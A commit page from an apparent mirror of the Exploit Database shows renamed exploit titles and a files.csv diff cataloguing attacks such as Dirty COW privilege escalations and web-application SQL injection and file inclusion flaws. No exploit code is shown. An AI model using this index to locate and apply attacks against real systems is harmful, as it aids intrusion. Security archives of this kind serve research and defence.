bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-12-01

Browse source 
7 new exploits

Xitami Web Server 5.0a0 - Denial of Service
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (Write Access)
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition PoC (Write Access)
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (SUID)

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition PoC (Write Access)

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd)
WinPower 4.9.0.4 - Privilege Escalation

Internet PhotoShow (page) - Remote File Inclusion
Internet PhotoShow 1.3 - 'page' Parameter Remote File Inclusion

EQdkp 1.3.0 - (dbal.php) Remote File Inclusion
EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion

CaLogic Calendars 1.2.2 - (CLPath) Remote File Inclusion
CaLogic Calendars 1.2.2 - 'CLPath' Remote File Inclusion

MercuryBoard 1.1.4 - (User-Agent) SQL Injection
MercuryBoard 1.1.4 - 'User-Agent' SQL Injection

EQdkp 1.3.1 - (Referer Spoof) Remote Database Backup
EQdkp 1.3.1 - 'Referer Spoof' Remote Database Backup

Web Slider 0.6 - (path) Remote File Inclusion
Web Slider 0.6 - 'path' Parameter Remote File Inclusion

Zomplog 3.8 - (mp3playlist.php speler) SQL Injection
Zomplog 3.8 - 'mp3playlist.php' SQL Injection

EQdkp 1.3.2 - (listmembers.php rank) SQL Injection
EQdkp 1.3.2 - 'listmembers.php' SQL Injection

CKGold Shopping Cart 2.0 - (category.php) Blind SQL Injection
CKGold Shopping Cart 2.0 - 'category.php' Blind SQL Injection

ActiveKB KnowledgeBase 2.x - 'catId' SQL Injection
ActiveKB KnowledgeBase 2.x - 'catId' Parameter SQL Injection

Zomplog 3.8.1 - upload_files.php Arbitrary File Upload
Zomplog 3.8.1 - Arbitrary File Upload

CMS Made Simple 1.2.2 - (TinyMCE module) SQL Injection
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection

Mega File Hosting Script 1.2 - (fid) SQL Injection
Mega File Hosting Script 1.2 - 'fid' Parameter SQL Injection

CMS Made Simple 1.2.4 - (FileManager module) Arbitrary File Upload
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload
AJ HYIP ACME - 'topic_detail.php id' SQL Injection
EQDKP 1.3.2f - (user_id) Authentication Bypass (PoC)
e107 Plugin BLOG Engine 2.2 - (rid) Blind SQL Injection
AJ HYIP ACME - 'topic_detail.php' SQL Injection
EQdkp 1.3.2f - 'user_id' Authentication Bypass (PoC)
e107 Plugin BLOG Engine 2.2 - 'rid' Parameter Blind SQL Injection

CaLogic Calendars 1.2.2 - (langsel) SQL Injection
CaLogic Calendars 1.2.2 - 'langsel' Parameter SQL Injection
EMO Realty Manager - 'news.php ida' SQL Injection
The Real Estate Script - 'dpage.php docID' SQL Injection
Linkspile - 'link.php cat_id' SQL Injection
Freelance Auction Script 1.0 - (browseproject.php) SQL Injection
EMO Realty Manager - 'ida' Parameter SQL Injection
The Real Estate Script - 'docID' Parameter SQL Injection
Linkspile - 'cat_id' Parameter SQL Injection
Freelance Auction Script 1.0 - 'browseproject.php' SQL Injection
rgboard 3.0.12 - (Remote File Inclusioni / Cross-Site Scripting) Multiple Vulnerabilities
Kostenloses Linkmanagementscript - (page_to_include) Remote File Inclusion
rgboard 3.0.12 - Remote File Inclusioni / Cross-Site Scripting
Kostenloses Linkmanagementscript - Remote File Inclusion
newsmanager 2.0 - (Remote File Inclusion / File Disclosure / SQL Injection / pb) Multiple Vulnerabilities
68 Classifieds 4.0 - (category.php cat) SQL Injection
newsmanager 2.0 - Remote File Inclusion / File Disclosure / SQL Injection
68 Classifieds 4.0 - 'category.php' SQL Injection

StanWeb.CMS - (default.asp id) SQL Injection
StanWeb.CMS - SQL Injection

Archangel Weblog 0.90.02 - (post_id) SQL Injection
Archangel Weblog 0.90.02 - 'post_id' Parameter SQL Injection

WR-Meeting 1.0 - (msnum) Local File Disclosure
WR-Meeting 1.0 - 'msnum' Parameter Local File Disclosure
FicHive 1.0 - (category) Blind SQL Injection
Smeego 1.0 - (Cookie lang) Local File Inclusion
FicHive 1.0 - 'category' Parameter Blind SQL Injection
Smeego 1.0 - 'Cookie lang' Local File Inclusion

TAGWORX.CMS - Multiple SQL Injections
TAGWORX.CMS 3.00.02 - Multiple SQL Injections
lulieblog 1.2 - Multiple Vulnerabilities
AlkalinePHP 0.77.35 - (adduser.php) Arbitrary Add Admin
easycms 0.4.2 - Multiple Vulnerabilities
Lulieblog 1.2 - Multiple Vulnerabilities
AlkalinePHP 0.77.35 - 'adduser.php' Arbitrary Add Admin
Easycms 0.4.2 - Multiple Vulnerabilities

AlkalinePHP 0.80.00 Beta - (thread.php id) SQL Injection
AlkalinePHP 0.80.00 Beta - 'thread.php' SQL Injection

EntertainmentScript - 'play.php id' SQL Injection
EntertainmentScript 1.4.0 - 'play.php' SQL Injection
ecms 0.4.2 - (SQL Injection / Security Bypass) Multiple Vulnerabilities
Mantis Bug Tracker 1.1.1 - (Code Execution / Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities
ComicShout 2.5 - (index.php comic_id) SQL Injection
eCMS 0.4.2 - SQL Injection / Security Bypass
Mantis Bug Tracker 1.1.1 - Code Execution / Cross-Site Scripting / Cross-Site Request Forgery
ComicShout 2.5 - 'comic_id' Parameter SQL Injection
PHP Jokesite 2.0 - 'cat_id' SQL Injection
Netious CMS 0.4 - (index.php pageid) SQL Injection
PHP Jokesite 2.0 - 'cat_id' Parameter SQL Injection
Netious CMS 0.4 - 'pageid' Parameter SQL Injection
6rbScript - 'news.php newsid' SQL Injection
webl?sninger 4 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
6rbScript - 'news.php' SQL Injection
Weblosninger 4 - Cross-Site Scripting / SQL Injection
e107 Plugin BLOG Engine 2.2 - 'uid' Blind SQL Injection
Quate CMS 0.3.4 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting / dt) Multiple Vulnerabilities
e107 Plugin BLOG Engine 2.2 - 'uid' Parameter Blind SQL Injection
Quate CMS 0.3.4 - Multiple Vulnerabilities
RoomPHPlanning 1.5 - (idresa) SQL Injection
PHPRaider 1.0.7 - (PHPbb3.functions.php) Remote File Inclusion
RoomPHPlanning 1.5 - 'idresa' Parameter SQL Injection
PHPRaider 1.0.7 - 'PHPbb3.functions.php' Remote File Inclusion

CMS MAXSITE 1.10 - (category) SQL Injection
CMS MAXSITE 1.10 - 'category' Parameter SQL Injection

CKGold Shopping Cart 2.5 - (category_id) SQL Injection
CKGold Shopping Cart 2.5 - 'category_id' Parameter SQL Injection

ComicShout 2.8 - (news.php news_id) SQL Injection
ComicShout 2.8 - 'news_id' Parameter SQL Injection

AJ HYIP ACME - 'news.php id' SQL Injection
AJ HYIP ACME - 'news.php' SQL Injection

Quate CMS 0.3.4 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Quate CMS 0.3.4 - Local File Inclusion / Cross-Site Scripting

e107 Plugin BLOG Engine 2.2 - 'uid' SQL Injection
e107 Plugin BLOG Engine 2.2 - 'uid' Parameter SQL Injection
AJ HYIP ACME - 'comment.php artid' SQL Injection
AJ HYIP ACME - 'readarticle.php artid' SQL Injection
AJ HYIP ACME - 'comment.php' SQL Injection
AJ HYIP ACME - 'readarticle.php' SQL Injection

6rbScript 3.3 - 'singerid' SQL Injection
6rbScript 3.3 - 'singerid' Parameter SQL Injection

6rbScript 3.3 - (section.php name) Local File Inclusion
6rbScript 3.3 - 'section.php' Local File Inclusion

RoomPHPlanning 1.6 - (userform.php) Create Admin User Exploit
RoomPHPlanning 1.6 - 'userform.php' Create Admin User

Mega File Hosting Script 1.2 - (cross.php url) Remote File Inclusion
Mega File Hosting Script 1.2 - 'url' Parameter Remote File Inclusion

Advanced Image Hosting (AIH) 2.3 - (gal) Blind SQL Injection
Advanced Image Hosting (AIH) 2.3 - 'gal' Parameter Blind SQL Injection

ActiveKB KnowledgeBase - 'loadpanel.php Panel' Local File Inclusion
ActiveKB KnowledgeBase - 'Panel' Parameter Local File Inclusion

Quate CMS 0.3.5 - (Remote File Inclusioni / Local File Inclusion) Multiple Vulnerabilities
Quate CMS 0.3.5 - Remote File Inclusion / Local File Inclusion

Zomplog CMS 3.9 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities
Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery

YABSoft Advanced Image Hosting Script - SQL Injection
Advanced Image Hosting Script - SQL Injection

MercuryBoard 1.1 - index.php SQL Injection
MercuryBoard 1.1 - 'index.php' SQL Injection

CMS Made Simple 0.10 - Lang.php Remote File Inclusion
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion

Zomplog 3.3/3.4 - detail.php HTML Injection
Zomplog 3.3/3.4 - 'detail.php' HTML Injection

CMS Made Simple 1.0.2 - SearchInput Cross-Site Scripting
CMS Made Simple 1.0.2 - 'SearchInput' Parameter Cross-Site Scripting

EQDKP 1.3.1 - Show Variable Cross-Site Scripting
EQdkp 1.3.1 - Cross-Site Scripting

CMS Made Simple 105 - Stylesheet.php SQL Injection
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection

Internet PhotoShow - 'login_admin' Parameter Unauthorized Access

68 Classifieds 4.1 - 'login.php' goto Parameter Cross-Site Scripting
68 Classifieds 4.1 - 'login.php' Cross-Site Scripting

68 Classifieds 4.1 - category.php cat Parameter Cross-Site Scripting
68 Classifieds 4.1 - 'category.php' Cross-Site Scripting
68 Classifieds 4.1 - searchresults.php page Parameter Cross-Site Scripting
68 Classifieds 4.1 - toplistings.php page Parameter Cross-Site Scripting
68 Classifieds 4.1 - viewlisting.php view Parameter Cross-Site Scripting
68 Classifieds 4.1 - viewmember.php member Parameter Cross-Site Scripting
68 Classifieds 4.1 - 'searchresults.php' Cross-Site Scripting
68 Classifieds 4.1 - 'toplistings.php' Cross-Site Scripting
68 Classifieds 4.1 - 'viewlisting.php' Cross-Site Scripting
68 Classifieds 4.1 - 'viewmember.php' Cross-Site Scripting

YABSoft Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting
Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting

CMS Made Simple Download Manager 1.4.1 Module - Arbitrary File Upload
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload

CMS Made Simple Antz Toolkit 1.02 Module - Arbitrary File Upload
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload

Zomplog 3.9 - 'message' Parameter Multiple Cross-Site Scripting Vulnerabilities
Zomplog 3.9 - 'message' Parameter Cross-Site Scripting

YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting
Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting
Wordpress Plugin WP Vault 0.8.6.6 - Local File Inclusion
Joomla! Component Catalog 1.0.7 - SQL Injection
Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection
Xfinity Gateway - Cross-Site Request Forgery
This commit is contained in:
Offensive Security 2016-12-01 07:48:18 +00:00
parent 91b12c469e
commit a5cd225af0
12 changed files with 1205 additions and 169 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

180
files.csv
View file

@ -3996,6 +3996,7 @@ id,file,description,date,author,platform,type,port
31763,platforms/windows/dos/31763.py,"SolidWorks Workgroup PDM 2014 SP2 Opcode 2001 - Denial of Service",2014-02-19,"Mohamed Shetta",windows,dos,30000
31785,platforms/multiple/dos/31785.txt,"Multiple Platform IPv6 Address Publication - Denial of Service Vulnerabilities",2008-05-13,"Tyler Reguly",multiple,dos,0
31791,platforms/windows/dos/31791.py,"Catia V5-6R2013 - 'CATV5_Backbone_Bus' Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555
40849,platforms/windows/dos/40849.py,"Xitami Web Server 5.0a0 - Denial of Service",2016-11-30,"Stefan Petrushevski",windows,dos,0
31815,platforms/linux/dos/31815.html,"libxslt XSL 1.1.23 - File Processing Buffer Overflow",2008-05-21,"Anthony de Almeida Lopes",linux,dos,0
31817,platforms/multiple/dos/31817.html,"Mozilla Firefox 2.0.0.14 - JSframe Heap Corruption Denial of Service",2008-05-21,0x000000,multiple,dos,0
31818,platforms/windows/dos/31818.sh,"vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)",2008-05-21,"Martin Nagy",windows,dos,0
@ -8641,8 +8642,8 @@ id,file,description,date,author,platform,type,port
40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
40608,platforms/windows/local/40608.cs,"Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation",2016-10-21,"Robin Verton",linux,local,0
40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition PoC (Write Access)",2016-10-19,"Phil Oester",linux,local,0
40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
40627,platforms/windows/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",windows,local,0
40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - SEH Local Buffer Overflow",2016-10-25,n30m1nd,windows,local,0
40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0
@ -8656,7 +8657,7 @@ id,file,description,date,author,platform,type,port
40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0
40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access)",2016-10-26,"Phil Oester",linux,local,0
40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition PoC (Write Access)",2016-10-26,"Phil Oester",linux,local,0
40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0
40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
@ -8666,7 +8667,9 @@ id,file,description,date,author,platform,type,port
40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0
40811,platforms/linux/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,linux,local,0
40812,platforms/linux/local/40812.c,"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation",2013-12-16,spender,linux,local,0
40839,platforms/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation",2016-11-28,FireFart,linux,local,0
40839,platforms/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd)",2016-11-28,FireFart,linux,local,0
40847,platforms/linux/local/40847.cpp,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd)",2016-11-27,"Gabriele Bonacini",linux,local,0
40848,platforms/windows/local/40848.java,"WinPower 4.9.0.4 - Privilege Escalation",2016-11-29,"Kacper Szurek",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -16060,7 +16063,7 @@ id,file,description,date,author,platform,type,port
1683,platforms/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - SQL Injection",2006-04-16,snatcher,php,webapps,0
1686,platforms/php/webapps/1686.pl,"FlexBB 0.5.5 - (/inc/start.php _COOKIE) SQL Bypass Exploit",2006-04-17,Devil-00,php,webapps,0
1687,platforms/php/webapps/1687.txt,"MyEvent 1.3 - (myevent_path) Remote File Inclusion",2006-04-17,botan,php,webapps,0
1694,platforms/php/webapps/1694.pl,"Internet PhotoShow (page) - Remote File Inclusion",2006-04-18,Hessam-x,php,webapps,0
1694,platforms/php/webapps/1694.pl,"Internet PhotoShow 1.3 - 'page' Parameter Remote File Inclusion",2006-04-18,Hessam-x,php,webapps,0
1695,platforms/php/webapps/1695.pl,"PHP Net Tools 2.7.1 - Remote Code Execution",2006-04-18,FOX_MULDER,php,webapps,0
1697,platforms/php/webapps/1697.php,"PCPIN Chat 5.0.4 - (login/language) Remote Code Execution",2006-04-19,rgod,php,webapps,0
1698,platforms/php/webapps/1698.php,"Joomla! 1.0.7 / Mambo 4.5.3 - (feed) Full Path Disclosure / Denial of Service",2006-04-19,trueend5,php,webapps,0
@ -16101,7 +16104,7 @@ id,file,description,date,author,platform,type,port
1760,platforms/php/webapps/1760.php,"PHP-Fusion 6.00.306 - Multiple Vulnerabilities",2006-05-07,rgod,php,webapps,0
1761,platforms/php/webapps/1761.pl,"Jetbox CMS 2.1 - (relative_script_path) Remote File Inclusion",2006-05-07,beford,php,webapps,0
1763,platforms/php/webapps/1763.txt,"ACal 2.2.6 - 'day.php' Remote File Inclusion",2006-05-07,PiNGuX,php,webapps,0
1764,platforms/php/webapps/1764.txt,"EQdkp 1.3.0 - (dbal.php) Remote File Inclusion",2006-05-07,OLiBekaS,php,webapps,0
1764,platforms/php/webapps/1764.txt,"EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion",2006-05-07,OLiBekaS,php,webapps,0
1765,platforms/php/webapps/1765.pl,"Dokeos Lms 1.6.4 - (authldap.php) Remote File Inclusion",2006-05-08,beford,php,webapps,0
1766,platforms/php/webapps/1766.pl,"Claroline E-Learning 1.75 - (ldap.inc.php) Remote File Inclusion",2006-05-08,beford,php,webapps,0
1767,platforms/php/webapps/1767.txt,"ActualAnalyzer Server 8.23 - (rf) Remote File Inclusion",2006-05-08,Aesthetico,php,webapps,0
@ -16126,7 +16129,7 @@ id,file,description,date,author,platform,type,port
1805,platforms/php/webapps/1805.pl,"phpListPro 2.0.1 - 'Language' Remote Code Execution",2006-05-19,[Oo],php,webapps,0
1807,platforms/asp/webapps/1807.txt,"Zix Forum 1.12 - 'layid' SQL Injection",2006-05-19,FarhadKey,asp,webapps,0
1808,platforms/php/webapps/1808.txt,"phpMyDirectory 10.4.4 - 'ROOT_PATH' Remote File Inclusion",2006-05-19,OLiBekaS,php,webapps,0
1809,platforms/php/webapps/1809.txt,"CaLogic Calendars 1.2.2 - (CLPath) Remote File Inclusion",2006-05-20,Kacper,php,webapps,0
1809,platforms/php/webapps/1809.txt,"CaLogic Calendars 1.2.2 - 'CLPath' Remote File Inclusion",2006-05-20,Kacper,php,webapps,0
1810,platforms/php/webapps/1810.pl,"Woltlab Burning Board 2.3.5 - (links.php) SQL Injection",2006-05-20,666,php,webapps,0
1811,platforms/php/webapps/1811.php,"XOOPS 2.0.13.2 - xoopsOption[nocommon] Remote Exploit",2006-05-21,rgod,php,webapps,0
1812,platforms/php/webapps/1812.pl,"Fusion News 1.0 (fil_config) - Remote File Inclusion",2006-05-21,X0r_1,php,webapps,0
@ -16430,7 +16433,7 @@ id,file,description,date,author,platform,type,port
2239,platforms/php/webapps/2239.txt,"Empire CMS 3.7 - (checklevel.php) Remote File Inclusion",2006-08-22,"Bob Linuson",php,webapps,0
2240,platforms/php/webapps/2240.txt,"HPE 1.0 - (HPEinc) Remote File Inclusion (2)",2006-08-22,"the master",php,webapps,0
2243,platforms/php/webapps/2243.php,"Simple Machines Forum (SMF) 1.1 rc2 - Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0
2247,platforms/php/webapps/2247.php,"MercuryBoard 1.1.4 - (User-Agent) SQL Injection",2006-08-23,rgod,php,webapps,0
2247,platforms/php/webapps/2247.php,"MercuryBoard 1.1.4 - 'User-Agent' SQL Injection",2006-08-23,rgod,php,webapps,0
2248,platforms/php/webapps/2248.pl,"phpBB All Topics Mod 1.5.0 - (start) SQL Injection",2006-08-23,SpiderZ,php,webapps,0
2249,platforms/php/webapps/2249.txt,"pSlash 0.7 - (lvc_include_dir) Remote File Inclusion",2006-08-23,"Mehmet Ince",php,webapps,0
2250,platforms/php/webapps/2250.pl,"Integramod Portal 2.x - (functions_portal.php) Remote File Inclusion",2006-08-23,nukedx,php,webapps,0
@ -17161,7 +17164,7 @@ id,file,description,date,author,platform,type,port
3249,platforms/php/webapps/3249.txt,"WebBuilder 2.0 - (StageLoader.php) Remote File Inclusion",2007-02-01,GoLd_M,php,webapps,0
3250,platforms/php/webapps/3250.txt,"Portail Web PHP 2.5.1 - 'includes.php' Remote File Inclusion",2007-02-01,"laurent gaffié",php,webapps,0
3251,platforms/php/webapps/3251.txt,"CoD2: DreamStats 4.2 - 'index.php' Remote File Inclusion",2007-02-02,"ThE dE@Th",php,webapps,0
3252,platforms/php/webapps/3252.txt,"EQdkp 1.3.1 - (Referer Spoof) Remote Database Backup",2007-02-02,Eight10,php,webapps,0
3252,platforms/php/webapps/3252.txt,"EQdkp 1.3.1 - 'Referer Spoof' Remote Database Backup",2007-02-02,Eight10,php,webapps,0
3253,platforms/php/webapps/3253.txt,"Flipper Poll 1.1.0 - (poll.php root_path) Remote File Inclusion",2007-02-02,"Mehmet Ince",php,webapps,0
3255,platforms/php/webapps/3255.php,"F3Site 2.1 - Remote Code Execution",2007-02-02,Kacper,php,webapps,0
3256,platforms/php/webapps/3256.txt,"dB Masters Curium CMS 1.03 - (c_id) SQL Injection",2007-02-02,ajann,php,webapps,0
@ -17458,7 +17461,7 @@ id,file,description,date,author,platform,type,port
3742,platforms/php/webapps/3742.pl,"NMDeluxe 1.0.1 - (footer.php template) Local File Inclusion",2007-04-15,BeyazKurt,php,webapps,0
3743,platforms/php/webapps/3743.txt,"Gallery 1.2.5 - (GALLERY_BASEDIR) Multiple Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0
3744,platforms/php/webapps/3744.txt,"audioCMS arash 0.1.4 - (arashlib_dir) Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0
3745,platforms/php/webapps/3745.txt,"Web Slider 0.6 - (path) Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0
3745,platforms/php/webapps/3745.txt,"Web Slider 0.6 - 'path' Parameter Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0
3747,platforms/php/webapps/3747.txt,"openMairie 1.10 - (scr/soustab.php) Local File Inclusion",2007-04-16,GoLd_M,php,webapps,0
3748,platforms/php/webapps/3748.txt,"SunShop Shopping Cart 3.5 - 'abs_path' Remote File Inclusion",2007-04-16,irvian,php,webapps,0
3749,platforms/php/webapps/3749.txt,"StoreFront for Gallery - (GALLERY_BASEDIR) Remote File Inclusion",2007-04-16,"Alkomandoz Hacker",php,webapps,0
@ -17586,7 +17589,7 @@ id,file,description,date,author,platform,type,port
3948,platforms/php/webapps/3948.txt,"Libstats 1.0.3 - (template_csv.php) Remote File Inclusion",2007-05-18,"Mehmet Ince",php,webapps,0
3949,platforms/php/webapps/3949.txt,"MolyX BOARD 2.5.0 - (index.php lang) Local File Inclusion",2007-05-18,MurderSkillz,php,webapps,0
3953,platforms/php/webapps/3953.txt,"SunLight CMS 5.3 - (root) Remote File Inclusion",2007-05-19,"Mehmet Ince",php,webapps,0
3955,platforms/php/webapps/3955.py,"Zomplog 3.8 - (mp3playlist.php speler) SQL Injection",2007-05-20,NeoMorphS,php,webapps,0
3955,platforms/php/webapps/3955.py,"Zomplog 3.8 - 'mp3playlist.php' SQL Injection",2007-05-20,NeoMorphS,php,webapps,0
3956,platforms/php/webapps/3956.php,"Alstrasoft e-Friends 4.21 - Admin Session Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0
3957,platforms/php/webapps/3957.php,"Alstrasoft Live Support 1.21 - Admin Credential Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0
3958,platforms/php/webapps/3958.php,"Alstrasoft Template Seller Pro 3.25 - Admin Password Change",2007-05-20,BlackHawk,php,webapps,0
@ -17625,7 +17628,7 @@ id,file,description,date,author,platform,type,port
4025,platforms/php/webapps/4025.php,"Quick.Cart 2.2 - Remote File Inclusion / Local File Inclusion Remote Code Execution",2007-06-02,Kacper,php,webapps,0
4026,platforms/php/webapps/4026.php,"PNPHPBB2 <= 1.2 - (index.php c) SQL Injection",2007-06-03,Kacper,php,webapps,0
4029,platforms/php/webapps/4029.php,"Sendcard 3.4.1 - (Local File Inclusion) Remote Code Execution",2007-06-04,Silentz,php,webapps,0
4030,platforms/php/webapps/4030.php,"EQdkp 1.3.2 - (listmembers.php rank) SQL Injection",2007-06-04,Silentz,php,webapps,0
4030,platforms/php/webapps/4030.php,"EQdkp 1.3.2 - 'listmembers.php' SQL Injection",2007-06-04,Silentz,php,webapps,0
4031,platforms/php/webapps/4031.txt,"Madirish Webmail 2.0 - (addressbook.php) Remote File Inclusion",2007-06-04,BoZKuRTSeRDaR,php,webapps,0
4034,platforms/php/webapps/4034.txt,"Kravchuk letter script 1.0 - (scdir) Remote File Inclusion",2007-06-05,"Mehmet Ince",php,webapps,0
4035,platforms/php/webapps/4035.txt,"Comicsense 0.2 - index.php 'epi' SQL Injection (1)",2007-06-05,s0cratex,php,webapps,0
@ -17800,7 +17803,7 @@ id,file,description,date,author,platform,type,port
4342,platforms/php/webapps/4342.txt,"NMDeluxe 2.0.0 - 'id' SQL Injection",2007-08-30,"not sec group",php,webapps,0
4343,platforms/cgi/webapps/4343.txt,"Ourspace 2.0.9 - (uploadmedia.cgi) Arbitrary File Upload",2007-08-30,Don,cgi,webapps,0
4346,platforms/php/webapps/4346.pl,"phpBB Links MOD 1.2.2 - SQL Injection",2007-08-31,Don,php,webapps,0
4349,platforms/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - (category.php) Blind SQL Injection",2007-08-31,k1tk4t,php,webapps,0
4349,platforms/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - 'category.php' Blind SQL Injection",2007-08-31,k1tk4t,php,webapps,0
4350,platforms/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 - SQL Injection",2007-09-01,Silentz,php,webapps,0
4352,platforms/php/webapps/4352.txt,"Weblogicnet - (files_dir) Multiple Remote File Inclusion",2007-09-02,bius,php,webapps,0
4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 - (error_view.php ID) SQL Injection",2007-09-02,k1tk4t,php,webapps,0
@ -17868,13 +17871,13 @@ id,file,description,date,author,platform,type,port
4456,platforms/php/webapps/4456.txt,"FrontAccounting 1.13 - Remote File Inclusion",2007-09-26,kezzap66345,php,webapps,0
4457,platforms/php/webapps/4457.txt,"Softbiz Classifieds PLUS - 'id' SQL Injection",2007-09-26,"Khashayar Fereidani",php,webapps,0
4458,platforms/asp/webapps/4458.txt,"Novus 1.0 - (notas.asp nota_id) SQL Injection",2007-09-26,ka0x,asp,webapps,0
4459,platforms/php/webapps/4459.txt,"ActiveKB KnowledgeBase 2.x - 'catId' SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0
